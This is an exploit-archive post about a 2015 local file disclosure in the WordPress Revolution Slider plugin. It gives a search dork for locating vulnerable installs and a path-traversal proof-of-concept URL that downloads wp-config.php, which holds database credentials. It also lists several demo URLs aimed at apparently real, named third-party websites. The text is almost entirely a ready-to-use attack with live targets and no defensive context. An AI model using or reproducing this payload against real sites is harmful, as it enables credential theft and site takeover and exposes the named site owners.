Home / exploits WordPress Revolution Slider Local File Disclosure
Posted on 27 January 2015
[+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Credits: [+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS* And All iranian Hacker's And Exploiter's <3 [+] iran-cyber.in
